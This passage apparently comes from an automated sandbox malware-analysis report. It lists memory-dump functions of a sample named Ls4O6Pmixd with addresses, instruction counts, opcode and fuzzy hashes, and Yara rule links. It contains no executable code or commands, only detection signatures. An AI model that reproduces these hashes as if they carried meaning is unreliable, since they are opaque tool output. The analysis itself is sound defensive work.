                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0ffa19d9bde540f4a3ea472c6ef83afeb5a55bd5ab0b8b32ffb09e57e42e306e
                                                                                            • Instruction ID: d1da2f7f60773be2feeb86a2ac704acc26e328eaf3fd02e1492d720fdede1878
                                                                                            • Opcode Fuzzy Hash: 0ffa19d9bde540f4a3ea472c6ef83afeb5a55bd5ab0b8b32ffb09e57e42e306e
                                                                                            • Instruction Fuzzy Hash: C2818A62B9874E4BA75CBE6C5C661397BC5DB95210F04413EE58ACB7D2FE14EC0A83C1
                                                                                            Function 00007FFAAC529B6D Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38916841d7387bbf1462fc2cb275f1dd4a0756e19135231991b2a2f289dda23c
                                                                                            • Instruction ID: 1029c8b6113f0771d69b674de4a0209cba569289f5243d41962afd8718095418
                                                                                            • Opcode Fuzzy Hash: 38916841d7387bbf1462fc2cb275f1dd4a0756e19135231991b2a2f289dda23c
                                                                                            • Instruction Fuzzy Hash: C55137337655064FA30C893DCD56066B6DBABD921031A863EE49BCB3D5EA34E91B8680
                                                                                            Function 00007FFAAC520938 Relevance: .2, Instructions: 206COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8bded7c7e9fcf61f640f6cbf60e0a4d0c746cb294fd83c144163a89aae0e550
                                                                                            • Instruction ID: ecf1d6ba7d4e8f4301837e60d060103e3150d81a65782c2d03b77308a59b7bb1
                                                                                            • Opcode Fuzzy Hash: c8bded7c7e9fcf61f640f6cbf60e0a4d0c746cb294fd83c144163a89aae0e550
                                                                                            • Instruction Fuzzy Hash: C55146337645064BA30C893DCD56076B6DBEBC821031A873EE49BDB3D5EE34E91B8680
                                                                                            Function 00007FFAAC529B90 Relevance: .2, Instructions: 205COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ddb364b0db5b35d8af91b1f0e9c191738aff120a914a51e713094021f70c6262
                                                                                            • Instruction ID: 14b1ea95f3b38f4d878b7ccb11d14f7565f4c7664b03f50be23770f6d72a8a86
                                                                                            • Opcode Fuzzy Hash: ddb364b0db5b35d8af91b1f0e9c191738aff120a914a51e713094021f70c6262
                                                                                            • Instruction Fuzzy Hash: B25137337645064BA30C893DCD56076B6DBEBD821035A873EE49BDB3D5EE34E91B8680
                                                                                            Function 00007FFAAC52BB78 Relevance: .2, Instructions: 150COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc92ace9a7319bd89d76d9e7c2740b1bdd868676d2436ff18fa42e80dfbe5bd3
                                                                                            • Instruction ID: 7b8c7b7fcfcc3ecaf9ef2d999aee300f71979d458d471f55141e3cda7d5a99ed
                                                                                            • Opcode Fuzzy Hash: cc92ace9a7319bd89d76d9e7c2740b1bdd868676d2436ff18fa42e80dfbe5bd3
                                                                                            • Instruction Fuzzy Hash: E9419572B198174FEBAC962D886907965CBEFC921039A51B9E00FCBBC4ED24DC0683C0
                                                                                            Function 00007FFAAC5355E5 Relevance: .1, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 79a0e4847895a8a7118b11fc45017c1e4ef40cf972e7d65ea6b440d378156235
                                                                                            • Instruction ID: 1e99c63be193ce587f9300c5aa263d80020e5f595c80a55501669b5c7b8a275f
                                                                                            • Opcode Fuzzy Hash: 79a0e4847895a8a7118b11fc45017c1e4ef40cf972e7d65ea6b440d378156235
                                                                                            • Instruction Fuzzy Hash: B141BF22B0D6164FFB6CDA6D88E827962D6EB89211786417EF44ECB3D2D904DC0983C0
                                                                                            Function 00007FFAAC52BA00 Relevance: .1, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7aaa7319a517cba79eeac11b64cfe8248ef7f4a226b90344bfaf9189139534b9
                                                                                            • Instruction ID: da9714de5bd591e237488f51279c37c5a5bb1d5b49ddd01e1609708a0d3c44aa
                                                                                            • Opcode Fuzzy Hash: 7aaa7319a517cba79eeac11b64cfe8248ef7f4a226b90344bfaf9189139534b9
                                                                                            • Instruction Fuzzy Hash: 70315733B1A81B4FA758DA2D98650BA25C7EFD522172A4139F44FCB398EE34DC578380
                                                                                            Function 00007FFAAC52B890 Relevance: .1, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bbc4ceb18a1934955f457f22be52842c3c9fad0a7686fd3e4be3d8bdaba68352
                                                                                            • Instruction ID: e1d362a4b76e5cc0bd33719a36c2750eaabfdc3b1d0b866584f96abc10f02ed0
                                                                                            • Opcode Fuzzy Hash: bbc4ceb18a1934955f457f22be52842c3c9fad0a7686fd3e4be3d8bdaba68352
                                                                                            • Instruction Fuzzy Hash: E5318D20759A0B4BBA9C9A2D68E923964CBEF95201784903EF50FC73C6DD44EC0943C4
                                                                                            Function 00007FFAAC520CA8 Relevance: .1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee24e49e06c1dd517c1b8a22780f8549aeb31681f6712f6cd1ca2ec160e14b67
                                                                                            • Instruction ID: 9544e2654893823b974cf7e6dc2105239ddb8a43a4fbe6a95b3e92425d4da78d
                                                                                            • Opcode Fuzzy Hash: ee24e49e06c1dd517c1b8a22780f8549aeb31681f6712f6cd1ca2ec160e14b67
                                                                                            • Instruction Fuzzy Hash: F431A0217196164FFB6CD96D84DC27962D6EB89311785413EF44ECB3D2D904DC0983C0
                                                                                            Function 00007FFAAC52B938 Relevance: .1, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 10fb387c557a3fafa0bacad833be6573a20a02147cbeaad814a468605fb85c0a
                                                                                            • Instruction ID: e1ba80a3dcec7b19d3c7778af9eef3ba62b6906b9407a20c475a8c3778b2621d
                                                                                            • Opcode Fuzzy Hash: 10fb387c557a3fafa0bacad833be6573a20a02147cbeaad814a468605fb85c0a
                                                                                            • Instruction Fuzzy Hash: 44317A15B9DA0F4FBA6C9A5DACED23566C6EBA5340395903EF90EC73C6DC48EC4942C0
                                                                                            Function 00007FFAAC520BE8 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0ab3dbcab63ec2dbdbca73e16f40e511c8c78b331e3b0804c854d0ed5414716
                                                                                            • Instruction ID: d94a4c39e561779b2867acbde85ec8d6a66c4b07c2304320cd888fb18c308d8c
                                                                                            • Opcode Fuzzy Hash: b0ab3dbcab63ec2dbdbca73e16f40e511c8c78b331e3b0804c854d0ed5414716
                                                                                            • Instruction Fuzzy Hash: 3F313B64B59A0E4FBB6CA75E589913676CAEBA5311B04813FB82FC73C2FE54DC0552C0